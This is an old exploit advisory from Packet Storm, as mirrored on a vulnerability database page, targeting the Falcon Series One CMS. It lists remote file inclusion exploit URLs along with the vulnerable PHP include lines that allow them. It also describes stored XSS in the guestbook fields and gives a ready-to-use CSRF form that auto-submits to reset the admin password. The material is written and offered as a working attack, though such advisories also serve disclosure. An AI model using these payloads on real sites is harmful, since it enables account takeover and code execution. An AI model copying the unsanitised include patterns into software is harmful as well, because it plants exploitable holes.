Lucene search
K

falconcms-rfixss.txt

🗓️ 10 Dec 2007 00:00:00Reported by KiNgOfThEwOrLdType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

Multiple Remote File Inclusion + Permanent Xss vulnerability in Falcon Series On

Code
`---------------------------------------------------------------  
____ __________ __ ____ __   
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_  
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\  
| | | \ | |/ \ \___| | /_____/ | || |   
|___|___| /\__| /______ /\___ >__| |___||__|   
\/\______| \/ \/   
---------------------------------------------------------------  
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org   
---------------------------------------------------------------  
Multilple Remote File Inclusion - Permanent Xss  
---------------------------------------------------------------  
# Author: MhZ91  
# Title: Falcon Series One - Multilple Remote File Inclusion + Permanent Xss  
# Download: http://sourceforge.net/projects/falconcms/  
# Bug: Multilple Remote File Inclusion + Permanent Xss  
# Severity: High  
# Visit: http://www.inj3ct-it.org  
---------------------------------------------------------------  
Exploit: http://[site]/sitemap.xml.php?dir[classes]=[Evil_Code]  
Vuln code: @include_once ($dir['classes']."class.pages.php");  
---------------------------------------------------------------  
Exploit: http://[site]/errors.php?error=[Evil_Code]  
Vuln code: <?include($_REQUEST["error"] . "/errors.php");?>  
---------------------------------------------------------------  
Permanent Xss at http://[site]/index.php?guestbook=v in the input gb_mail, gb_name and textarea gb_text your [Xss] and after the xss work here index.php?guestbook=v :p  
---------------------------------------------------------------  
Simple 1337 Csrf exploit:  
<form name="form_change" action="http://[site]/index.php?admin=changepass" method="post">  
<input type="hidden" name="f_pass" class="field" value="[YourPWD]" />  
<input type="hidden" name="f_pass2" class="field" value="[YourPWD]" />  
</form><script>document.form_change.submit()</script>  
There is other more csrf and permanent xss..   
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation